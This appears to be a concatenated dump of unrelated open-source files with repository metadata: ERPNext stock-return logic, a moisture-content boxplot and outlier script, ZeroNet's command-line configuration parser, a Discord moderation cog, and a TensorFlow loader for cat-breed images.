ref_item) if account not in children: children.append(account) if not parent: parent = {"account": si.debit_to} break if len(invoices_against_delivery) == 1: parent["against_invoice"] = invoices_against_delivery[0] result = [parent] + [{"account": account} for account in children] return result def get_invoice_list(doctype, link_field, value): if isinstance(value, basestring): value = [value] return frappe.db.sql_list("""select distinct parent from `tab%s` where docstatus = 1 and `%s` in (%s)""" % (doctype, link_field, ", ".join(["%s"]*len(value))), tuple(value)) def make_return_jv_from_purchase_receipt(se, ref): invoice_against_receipt = get_invoice_list("Purchase Invoice Item", "purchase_receipt", ref.doc.name) if not invoice_against_receipt: purchase_orders_against_receipt = [d.prevdoc_docname for d in ref.doc.get(ref.doc.fname, {"prevdoc_doctype": "Purchase Order"}) if getattr(d, "prevdoc_docname", None)] if purchase_orders_against_receipt: invoice_against_receipt = get_invoice_list("Purchase Invoice Item", "purchase_order", purchase_orders_against_receipt) if not invoice_against_receipt: return [] parent = {} children = [] for se_item in se.get("mtn_details"): for purchase_invoice in invoice_against_receipt: pi = frappe.get_doc("Purchase Invoice", purchase_invoice) ref_item = pi.get({"item_code": se_item.item_code}) if not ref_item: continue ref_item = ref_item[0] account = ref_item.expense_account if 
account not in children: children.append(account) if not parent: parent = {"account": pi.credit_to} break if len(invoice_against_receipt) == 1: parent["against_voucher"] = invoice_against_receipt[0] result = [parent] + [{"account": account} for account in children] return result
agpl-3.0
3,160,072,189,511,768,600
35.210251
143
0.676546
false
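The return validation in validate_return_reference_doc() above boils down to one rule: a row may return at most the reference document's quantity minus what was already returned against it. A reduced sketch of that rule; the function name and the figures are illustrative, not ERPNext API:

def check_return_qty(item_code, transfer_qty, ref_item_qty, already_returned):
    # Same arithmetic as validate_return_reference_doc().
    returnable_qty = ref_item_qty - already_returned.get(item_code, 0)
    if not returnable_qty:
        raise ValueError("Item %s has already been returned" % item_code)
    elif transfer_qty > returnable_qty:
        raise ValueError("Cannot return more than %s for Item %s"
                         % (returnable_qty, item_code))


check_return_qty("ITEM-001", transfer_qty=2, ref_item_qty=10,
                 already_returned={"ITEM-001": 8})      # ok: 2 still returnable
# check_return_qty("ITEM-001", 3, 10, {"ITEM-001": 8})  # would raise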
thp44/delphin_6_automation
data_process/2d_1d/archieve/moisture_content_comparison.py
1
18274
__author__ = "Christian Kongsgaard" __license__ = 'MIT' # -------------------------------------------------------------------------------------------------------------------- # # IMPORTS # Modules import pandas as pd import matplotlib.pyplot as plt # RiBuild Modules # -------------------------------------------------------------------------------------------------------------------- # # RIBuild out_folder = r'C:\Users\ocni\PycharmProjects\delphin_6_automation\data_process\2d_1d\processed_data' graphic_folder = r'U:\RIBuild\2D_1D\Processed Results\4A' hdf_file = out_folder + '/relative_moisture_content.h5' # Open HDF # Uninsulated dresdenzp_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_high_ratio_uninsulated_4a') dresdenzd_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_high_ratio_uninsulated_4a') postdam_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'potsdam_high_ratio_uninsulated_4a') dresdenzp_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_low_ratio_uninsulated_4a') dresdenzd_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_low_ratio_uninsulated_4a') postdam_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'potsdam_low_ratio_uninsulated_4a') total_uninsulated_4a = pd.concat([dresdenzp_highratio_uninsulated_4a, dresdenzd_highratio_uninsulated_4a, postdam_highratio_uninsulated_4a, dresdenzp_lowratio_uninsulated_4a, dresdenzd_lowratio_uninsulated_4a, postdam_lowratio_uninsulated_4a]) # Insulated dresdenzp_highratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_high_ratio_insulated_4a') dresdenzd_highratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_high_ratio_insulated_4a') postdam_highratio_insulated_4a = pd.read_hdf(hdf_file, 'potsdam_high_ratio_insulated_4a') dresdenzp_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_low_ratio_insulated_4a') dresdenzd_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_low_ratio_insulated_4a') postdam_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'potsdam_low_ratio_insulated_4a') total_insulated_4a = pd.concat([dresdenzp_highratio_insulated_4a, dresdenzd_highratio_insulated_4a, postdam_highratio_insulated_4a, dresdenzp_lowratio_insulated_4a, dresdenzd_lowratio_insulated_4a, postdam_lowratio_insulated_4a]) def plots(plot, save=False): """ Creates box plots from all the wall scenarios """ if plot == 'uninsulated' or plot == 'all': plt.figure('dresdenzp_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzp_highratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/dresdenzp_highratio_uninsulated_4a_moisture") plt.figure('dresdenzd_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzd_highratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/dresdenzd_highratio_uninsulated_4a_moisture") plt.figure('postdam_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) postdam_highratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 
'Moisture Content\n' 'Brick: Potsdam - Mortar: High Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/postdam_highratio_uninsulated_4a_moisture") plt.figure('dresdenzp_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzp_lowratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/dresdenzp_lowratio_uninsulated_4a_moisture") plt.figure('dresdenzd_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzd_lowratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/dresdenzd_lowratio_uninsulated_4a_moisture") plt.figure('postdam_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) postdam_lowratio_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: None') if save: plt.savefig(f"{graphic_folder}/postdam_lowratio_uninsulated_4a_moisture") plt.figure('total_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True) total_uninsulated_4a.boxplot(showfliers=False) plt.ylim(-5, 1100) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: All - Mortar: All - Insulation: None') if save: plt.savefig(f"{graphic_folder}/total_uninsulated_4a_moisture") if plot == 'insulated' or plot == 'all': plt.figure('dresdenzp_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzp_highratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/dresdenzp_highratio_insulated_4a_moisture") plt.figure('dresdenzd_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzd_highratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/dresdenzd_highratio_insulated_4a_moisture") plt.figure('postdam_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) postdam_highratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Potsdam - Mortar: High Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/postdam_highratio_insulated_4a_moisture") plt.figure('dresdenzp_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzp_lowratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 
'Moisture Content\n' 'Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/dresdenzp_lowratio_insulated_4a_moisture") plt.figure('dresdenzd_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) dresdenzd_lowratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/dresdenzd_lowratio_insulated_4a_moisture") plt.figure('postdam_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) postdam_lowratio_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/postdam_lowratio_insulated_4a_moisture") plt.figure('total_insulated_4a_moisture', figsize=(16, 8), tight_layout=True) total_insulated_4a.boxplot(showfliers=False) plt.ylim(-5, 2000) plt.ylabel('Relative Difference in %') plt.title('Weighted Relative Difference between 1D and 2D\n' 'Moisture Content\n' 'Brick: All - Mortar: All - Insulation: Calcium Silicate') if save: plt.savefig(f"{graphic_folder}/total_insulated_4a_moisture") plt.show() plots('all', False) def std3_ratio(print_=False, excel=False): """Computes ratio of outliers in the data sets. Outliers is here defined as data points deviating with more the 3 standard deviations from the mean.""" std3_uninsulated_ratio_ = uninsulated() std3_insulated_ratio_ = insulated() if print_: print('Uninsulated') print(std3_uninsulated_ratio_) print('') print('Insulated') print(std3_insulated_ratio_) if excel: writer = pd.ExcelWriter(f'{out_folder}/moisture_std_ratios.xlsx') std3_uninsulated_ratio_.to_excel(writer, 'Uninsulated') std3_insulated_ratio_.to_excel(writer, 'Insulated') writer.save() def uninsulated(): """Computes the outliers for the uninsulated cases""" outliers_total_uninsulated = (total_uninsulated_4a.shape[0] - total_uninsulated_4a.sub(total_uninsulated_4a.mean()) .div(total_uninsulated_4a.std()).abs().lt(3).sum()) / total_uninsulated_4a.shape[0] outliers_zd_high_uninsulated = (dresdenzd_highratio_uninsulated_4a.shape[0] - dresdenzd_highratio_uninsulated_4a.sub(dresdenzd_highratio_uninsulated_4a.mean()) .div(dresdenzd_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / dresdenzd_highratio_uninsulated_4a.shape[0] outliers_zp_high_uninsulated = (dresdenzp_highratio_uninsulated_4a.shape[0] - dresdenzp_highratio_uninsulated_4a.sub(dresdenzp_highratio_uninsulated_4a.mean()) .div(dresdenzp_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / dresdenzp_highratio_uninsulated_4a.shape[0] outliers_pd_high_uninsulated = (postdam_highratio_uninsulated_4a.shape[0] - postdam_highratio_uninsulated_4a.sub(postdam_highratio_uninsulated_4a.mean()) .div(postdam_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / postdam_highratio_uninsulated_4a.shape[0] outliers_zd_low_uninsulated = (dresdenzd_lowratio_uninsulated_4a.shape[0] - dresdenzd_lowratio_uninsulated_4a.sub(dresdenzd_lowratio_uninsulated_4a.mean()) .div(dresdenzd_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / dresdenzd_lowratio_uninsulated_4a.shape[0] outliers_zp_low_uninsulated = (dresdenzp_lowratio_uninsulated_4a.shape[0] - 
dresdenzp_lowratio_uninsulated_4a.sub(dresdenzp_lowratio_uninsulated_4a.mean()) .div(dresdenzp_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / dresdenzp_lowratio_uninsulated_4a.shape[0] outliers_pd_low_uninsulated = (postdam_lowratio_uninsulated_4a.shape[0] - postdam_lowratio_uninsulated_4a.sub(postdam_lowratio_uninsulated_4a.mean()) .div(postdam_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \ / postdam_lowratio_uninsulated_4a.shape[0] outliers_uninsulated_ratio_ = pd.concat([outliers_total_uninsulated, outliers_zd_high_uninsulated, outliers_zp_high_uninsulated, outliers_pd_high_uninsulated, outliers_zd_low_uninsulated, outliers_zp_low_uninsulated, outliers_pd_low_uninsulated], axis=1) outliers_uninsulated_ratio_.columns = ["Brick: All - Mortar: All - Insulation: None", "Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: None", "Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: None", "Brick: Potsdam - Mortar: High Cement Ratio - Insulation: None", "Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: None", "Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: None", "Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: None"] return outliers_uninsulated_ratio_ def insulated(): """Computes the outliers for the insulated cases""" outliers_total_insulated = (total_insulated_4a.shape[0] - total_insulated_4a.sub(total_insulated_4a.mean()) .div(total_insulated_4a.std()).abs().lt(3).sum()) / total_insulated_4a.shape[0] outliers_zd_high_insulated = (dresdenzd_highratio_insulated_4a.shape[0] - dresdenzd_highratio_insulated_4a.sub(dresdenzd_highratio_insulated_4a.mean()) .div(dresdenzd_highratio_insulated_4a.std()).abs().lt(3).sum()) \ / dresdenzd_highratio_insulated_4a.shape[0] outliers_zp_high_insulated = (dresdenzp_highratio_insulated_4a.shape[0] - dresdenzp_highratio_insulated_4a.sub(dresdenzp_highratio_insulated_4a.mean()) .div(dresdenzp_highratio_insulated_4a.std()).abs().lt(3).sum()) \ / dresdenzp_highratio_insulated_4a.shape[0] outliers_pd_high_insulated = (postdam_highratio_insulated_4a.shape[0] - postdam_highratio_insulated_4a.sub(postdam_highratio_insulated_4a.mean()) .div(postdam_highratio_insulated_4a.std()).abs().lt(3).sum()) \ / postdam_highratio_insulated_4a.shape[0] outliers_zd_low_insulated = (dresdenzd_lowratio_insulated_4a.shape[0] - dresdenzd_lowratio_insulated_4a.sub(dresdenzd_lowratio_insulated_4a.mean()) .div(dresdenzd_lowratio_insulated_4a.std()).abs().lt(3).sum()) \ / dresdenzd_lowratio_insulated_4a.shape[0] outliers_zp_low_insulated = (dresdenzp_lowratio_insulated_4a.shape[0] - dresdenzp_lowratio_insulated_4a.sub(dresdenzp_lowratio_insulated_4a.mean()) .div(dresdenzp_lowratio_insulated_4a.std()).abs().lt(3).sum()) \ / dresdenzp_lowratio_insulated_4a.shape[0] outliers_pd_low_insulated = (postdam_lowratio_insulated_4a.shape[0] - postdam_lowratio_insulated_4a.sub(postdam_lowratio_insulated_4a.mean()) .div(postdam_lowratio_insulated_4a.std()).abs().lt(3).sum()) \ / postdam_lowratio_insulated_4a.shape[0] std2_insulated_ratio_ = pd.concat([outliers_total_insulated, outliers_zd_high_insulated, outliers_zp_high_insulated, outliers_pd_high_insulated, outliers_zd_low_insulated, outliers_zp_low_insulated, outliers_pd_low_insulated], axis=1) std2_insulated_ratio_.columns = ["Brick: All - Mortar: All - Insulation: None", "Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: Calcium Silicate", "Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: Calcium Silicate", "Brick: Potsdam - Mortar: High Cement Ratio - Insulation: 
Calcium Silicate", "Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: Calcium Silicate", "Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: Calcium Silicate", "Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: Calcium Silicate"] return std2_insulated_ratio_ #std3_ratio(False, True)
mit
-2,501,209,804,834,219,500
55.575851
120
0.600088
false
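The outlier ratios in uninsulated() and insulated() all apply one formula: the share of values deviating more than three standard deviations from the column mean. A sketch on toy data; the DataFrame below is fabricated for illustration:

import numpy as np
import pandas as pd

rng = np.random.RandomState(0)
df = pd.DataFrame({'a': np.concatenate([rng.normal(size=998), [50.0, -50.0]])})

# Same expression as in uninsulated()/insulated().
within_3_std = df.sub(df.mean()).div(df.std()).abs().lt(3).sum()
outlier_ratio = (df.shape[0] - within_3_std) / df.shape[0]
print(outlier_ratio['a'])  # 0.002: only the two planted extremes fall outside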
bloff/ZeroNet
src/Config.py
1
11857
import argparse
import sys
import os
import ConfigParser


class Config(object):

    def __init__(self, argv):
        self.version = "0.3.1"
        self.rev = 307
        self.argv = argv
        self.action = None
        self.createParser()
        self.createArguments()

    def createParser(self):
        # Create parser
        self.parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
        self.parser.register('type', 'bool', self.strToBool)
        self.subparsers = self.parser.add_subparsers(title="Action to perform", dest="action")

    def __str__(self):
        return str(self.arguments).replace("Namespace", "Config")  # Using argparse str output

    # Convert string to bool
    def strToBool(self, v):
        return v.lower() in ("yes", "true", "t", "1")

    # Create command line arguments
    def createArguments(self):
        # Platform specific
        if sys.platform.startswith("win"):
            coffeescript = "type %s | tools\\coffee\\coffee.cmd"
        else:
            coffeescript = None
        use_openssl = True

        # Main
        action = self.subparsers.add_parser("main", help='Start UiServer and FileServer (default)')

        # SiteCreate
        action = self.subparsers.add_parser("siteCreate", help='Create a new site')

        # SiteSign
        action = self.subparsers.add_parser("siteSign", help='Update and sign content.json: address [privatekey]')
        action.add_argument('address', help='Site to sign')
        action.add_argument('privatekey', help='Private key (default: ask on execute)', nargs='?')
        action.add_argument('--inner_path', help='File you want to sign (default: content.json)',
                            default="content.json", metavar="inner_path")
        action.add_argument('--publish', help='Publish site after the signing', action='store_true')

        # SitePublish
        action = self.subparsers.add_parser("sitePublish", help='Publish site to other peers: address')
        action.add_argument('address', help='Site to publish')
        action.add_argument('peer_ip', help='Peer ip to publish (default: random peers ip from tracker)',
                            default=None, nargs='?')
        action.add_argument('peer_port', help='Peer port to publish (default: random peer port from tracker)',
                            default=15441, nargs='?')
        action.add_argument('--inner_path', help='Content.json you want to publish (default: content.json)',
                            default="content.json", metavar="inner_path")

        # SiteVerify
        action = self.subparsers.add_parser("siteVerify", help='Verify site files using sha512: address')
        action.add_argument('address', help='Site to verify')

        # dbRebuild
        action = self.subparsers.add_parser("dbRebuild", help='Rebuild site database cache')
        action.add_argument('address', help='Site to rebuild')

        # dbQuery
        action = self.subparsers.add_parser("dbQuery", help='Query site sql cache')
        action.add_argument('address', help='Site to query')
        action.add_argument('query', help='Sql query')

        # PeerPing
        action = self.subparsers.add_parser("peerPing", help='Send Ping command to peer')
        action.add_argument('peer_ip', help='Peer ip')
        action.add_argument('peer_port', help='Peer port', nargs='?')

        # PeerGetFile
        action = self.subparsers.add_parser("peerGetFile", help='Request and print a file content from peer')
        action.add_argument('peer_ip', help='Peer ip')
        action.add_argument('peer_port', help='Peer port')
        action.add_argument('site', help='Site address')
        action.add_argument('filename', help='File name to request')

        # PeerCmd
        action = self.subparsers.add_parser("peerCmd", help='Request and print a file content from peer')
        action.add_argument('peer_ip', help='Peer ip')
        action.add_argument('peer_port', help='Peer port')
        action.add_argument('cmd', help='Command to execute')
        action.add_argument('parameters', help='Parameters to command', nargs='?')

        # CryptSign
        action = self.subparsers.add_parser("cryptSign", help='Sign message using Bitcoin private key')
        action.add_argument('message', help='Message to sign')
        action.add_argument('privatekey', help='Private key')

        # Config parameters
        self.parser.add_argument('--debug', help='Debug mode', action='store_true')
        self.parser.add_argument('--debug_socket', help='Debug socket connections', action='store_true')

        self.parser.add_argument('--config_file', help='Path of config file', default="zeronet.conf", metavar="path")
        self.parser.add_argument('--data_dir', help='Path of data directory', default="data", metavar="path")
        self.parser.add_argument('--log_dir', help='Path of logging directory', default="log", metavar="path")

        self.parser.add_argument('--ui_ip', help='Web interface bind address', default="127.0.0.1", metavar='ip')
        self.parser.add_argument('--ui_port', help='Web interface bind port', default=43110, type=int, metavar='port')
        self.parser.add_argument('--ui_restrict', help='Restrict web access', default=False, metavar='ip', nargs='*')
        self.parser.add_argument('--open_browser', help='Open homepage in web browser automatically',
                                 nargs='?', const="default_browser", metavar='browser_name')
        self.parser.add_argument('--homepage', help='Web interface Homepage',
                                 default='1EU1tbG9oC1A8jz2ouVwGZyQ5asrNsE4Vr', metavar='address')
        self.parser.add_argument('--size_limit', help='Default site size limit in MB', default=10, metavar='size')

        self.parser.add_argument('--fileserver_ip', help='FileServer bind address', default="*", metavar='ip')
        self.parser.add_argument('--fileserver_port', help='FileServer bind port', default=15441, type=int, metavar='port')
        self.parser.add_argument('--disable_udp', help='Disable UDP connections', action='store_true')
        self.parser.add_argument('--proxy', help='Socks proxy address', metavar='ip:port')
        self.parser.add_argument('--ip_external', help='External ip (tested on start if None)', metavar='ip')
        self.parser.add_argument('--use_openssl', help='Use OpenSSL library for speedup', type='bool',
                                 choices=[True, False], default=use_openssl)
        self.parser.add_argument('--disable_encryption', help='Disable connection encryption', action='store_true')
        self.parser.add_argument('--disable_sslcompression', help='Disable SSL compression to save memory',
                                 type='bool', choices=[True, False], default=True)
        self.parser.add_argument('--coffeescript_compiler', help='Coffeescript compiler for developing',
                                 default=coffeescript, metavar='executable_path')

        self.parser.add_argument('--version', action='version', version='ZeroNet %s r%s' % (self.version, self.rev))

        return self.parser

    # Find arguments specified for current action
    def getActionArguments(self):
        back = {}
        arguments = self.parser._subparsers._group_actions[0].choices[self.action]._actions[1:]  # First is --version
        for argument in arguments:
            back[argument.dest] = getattr(self, argument.dest)
        return back

    # Try to find action from argv
    def getAction(self, argv):
        actions = [action.choices.keys() for action in self.parser._actions if action.dest == "action"][0]  # Valid actions
        found_action = False
        for action in actions:  # See if any in argv
            if action in argv:
                found_action = action
                break
        return found_action

    # Move plugin parameters to end of argument list
    def moveUnknownToEnd(self, argv, default_action):
        valid_actions = sum([action.option_strings for action in self.parser._actions], [])
        valid_parameters = []
        plugin_parameters = []
        plugin = False
        for arg in argv:
            if arg.startswith("--"):
                if arg not in valid_actions:
                    plugin = True
                else:
                    plugin = False
            elif arg == default_action:
                plugin = False

            if plugin:
                plugin_parameters.append(arg)
            else:
                valid_parameters.append(arg)
        return valid_parameters + plugin_parameters

    # Parse arguments from config file and command line
    def parse(self, silent=False, parse_config=True):
        if silent:  # Don't display messages or quit on unknown parameter
            original_print_message = self.parser._print_message
            original_exit = self.parser.exit

            def silent(parser, function_name):
                parser.exited = True
                return None

            self.parser.exited = False
            self.parser._print_message = lambda *args, **kwargs: silent(self.parser, "_print_message")
            self.parser.exit = lambda *args, **kwargs: silent(self.parser, "exit")

        argv = self.argv[:]  # Copy command line arguments
        if parse_config:
            argv = self.parseConfig(argv)  # Add arguments from config file
        self.parseCommandline(argv, silent)  # Parse argv
        self.setAttributes()

        if silent:  # Restore original functions
            if self.parser.exited and self.action == "main":  # Argument parsing halted, don't start ZeroNet with main action
                self.action = None
            self.parser._print_message = original_print_message
            self.parser.exit = original_exit

    # Parse command line arguments
    def parseCommandline(self, argv, silent=False):
        # Find out if action is specified on start
        action = self.getAction(argv)
        if not action:
            argv.append("main")
            action = "main"
        argv = self.moveUnknownToEnd(argv, action)
        if silent:
            res = self.parser.parse_known_args(argv[1:])
            if res:
                self.arguments = res[0]
            else:
                self.arguments = {}
        else:
            self.arguments = self.parser.parse_args(argv[1:])

    # Parse config file
    def parseConfig(self, argv):
        # Find config file path from parameters
        config_file = "zeronet.conf"
        if "--config_file" in argv:
            config_file = argv[argv.index("--config_file") + 1]
        # Load config file
        if os.path.isfile(config_file):
            config = ConfigParser.ConfigParser(allow_no_value=True)
            config.read(config_file)
            for section in config.sections():
                for key, val in config.items(section):
                    if section != "global":  # If not global prefix key with section
                        key = section + "_" + key
                    if val:
                        argv.insert(1, val)
                    argv.insert(1, "--%s" % key)
        return argv

    # Expose arguments as class attributes
    def setAttributes(self):
        # Set attributes from arguments
        if self.arguments:
            args = vars(self.arguments)
            for key, val in args.items():
                setattr(self, key, val)

    def loadPlugins(self):
        from Plugin import PluginManager

        @PluginManager.acceptPlugins
        class ConfigPlugin(object):
            def __init__(self, config):
                self.parser = config.parser
                self.createArguments()

            def createArguments(self):
                pass

        ConfigPlugin(self)


config = Config(sys.argv)
gpl-2.0
6,955,166,451,912,471,000
44.779923
126
0.609007
false
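A short usage sketch for the Config class above (my illustration, not part of the ZeroNet record): the module builds a singleton `config` at import time, so callers parse once and then read flags as attributes. The flag names come from createArguments; this is Python 2 era code, so print statements are used.

# Hypothetical caller, assuming src/ is on sys.path.
from Config import config

config.parse(silent=True)    # tolerate unknown plugin flags
print config.ui_port         # 43110 unless overridden by CLI or zeronet.conf
if config.action == "siteSign":
    # subparser arguments also become attributes after parse()
    print config.getActionArguments()  # e.g. {'address': ..., 'privatekey': ...}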
MaT1g3R/YasenBaka
cogs/moderation.py
1
3215
from discord import DiscordException, Forbidden, HTTPException
from discord.ext import commands
from discord.ext.commands import Context

from bot import Yasen
from scripts.checks import has_manage_message, is_admin, no_pm
from scripts.discord_utils import leading_members
from scripts.helpers import parse_number


class Moderation:
    """
    Moderation commands.
    """
    __slots__ = ('bot',)

    def __init__(self, bot: Yasen):
        self.bot = bot

    def __local_check(self, ctx: Context):
        return no_pm(ctx)

    @commands.command()
    @commands.check(is_admin)
    async def masspm(self, ctx: Context, *, args: str = None):
        """
        Description: Send pm to all mentioned members.
        Restriction: Cannot be used in private message.
        Permission Required: Administrator
        Usage: "`{prefix}masspm @mention0 @mention1 my message`"
        """
        if not args:
            await ctx.send(
                'Please mention at least one member and include '
                'a message to send.'
            )
            return
        members, msg = leading_members(ctx, args)
        if not members:
            await ctx.send('Please mention at least one member.')
            return
        if not msg:
            await ctx.send('Please enter a message for me to send.')
            return
        sent = []
        failed = []
        for m in members:
            try:
                await m.send(msg)
                sent.append(m.display_name)
            except DiscordException as e:
                self.bot.logger.warn(str(e))
                failed.append(m.display_name)
        success_msg = (f'PM sent to the following members:'
                       f'\n```\n{", ".join(sent)}\n```') if sent else ''
        failed_msg = (f'Failed to send PMs to the following members:'
                      f'\n```\n{", ".join(failed)}\n```') if failed else ''
        if success_msg or failed_msg:
            await ctx.send(f'{success_msg}{failed_msg}')

    @commands.command()
    @commands.check(has_manage_message)
    async def purge(self, ctx: Context, num=None):
        """
        Description: Purge up to 99 messages in the current channel.
        Restriction: |
            Cannot be used in private message.
            Can only purge from 1 to 99 (inclusive) messages at once.
        Permission Required: Manage Messages
        Usage: "`{prefix}purge num` where num is a number between 1 and 99."
        """
        num = parse_number(num, int) or 0
        if not 1 <= num <= 99:
            await ctx.send(
                'Please enter a number between 1 and 99.', delete_after=3
            )
            return
        try:
            deleted = await ctx.channel.purge(limit=num + 1)
        except Forbidden:
            await ctx.send('I do not have the permissions to purge messages.')
        except HTTPException:
            await ctx.send(':no_entry_sign: Purging messages failed.')
        else:
            deleted_num = len(deleted) - 1
            msg_str = (f'{deleted_num} message'
                       if num == 1 else f'{deleted_num} messages')
            await ctx.send(f':recycle: Purged {msg_str}.', delete_after=3)
apache-2.0
-242,369,800,436,003,700
35.534091
78
0.565474
false
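A brief wiring sketch for the cog above (illustrative, not from the repository): discord.py cogs of this vintage are registered through an extension-style setup hook so the commands become active on the bot.

# Hypothetical extension entry point, e.g. loaded via bot.load_extension('cogs.moderation').
def setup(bot):
    bot.add_cog(Moderation(bot))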
ceroytres/cat_nets
cat_nets/datasets/read_pets.py
1
1970
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import

import tensorflow as tf
import csv


def catClassification_loader(path):
    cat_names = ['Abyssinian', 'Bengal', 'Birman', 'Bombay', 'British_Shorthair',
                 'Egyptian_Mau', 'Maine_Coon', 'Persian', 'Ragdoll', 'Russian_Blue',
                 'Siamese', 'Sphynx']

    cat_dict = dict(zip(cat_names, range(len(cat_names))))

    labels_list, filename_list = [], []
    with open(path, mode='r') as csvfile:
        reader = csv.reader(csvfile, delimiter=',')
        for row in reader:
            labels_list.append(cat_dict[row[0]])
            filename_list.append(row[1])

    labels_list = tf.convert_to_tensor(labels_list)
    images_list = tf.convert_to_tensor(filename_list)

    filename_queue = tf.train.slice_input_producer([labels_list, images_list],
                                                   shuffle=True)

    label = filename_queue[0]
    filename = filename_queue[1]

    raw_image = tf.read_file(filename)
    image = tf.image.decode_jpeg(raw_image, channels=3)

    cat_dict = dict(zip(cat_dict.values(), cat_dict.keys()))

    return image, label, cat_dict

#    image = tf.image.resize_images(image, image_size,
#                                   method=tf.image.ResizeMethod.BILINEAR,
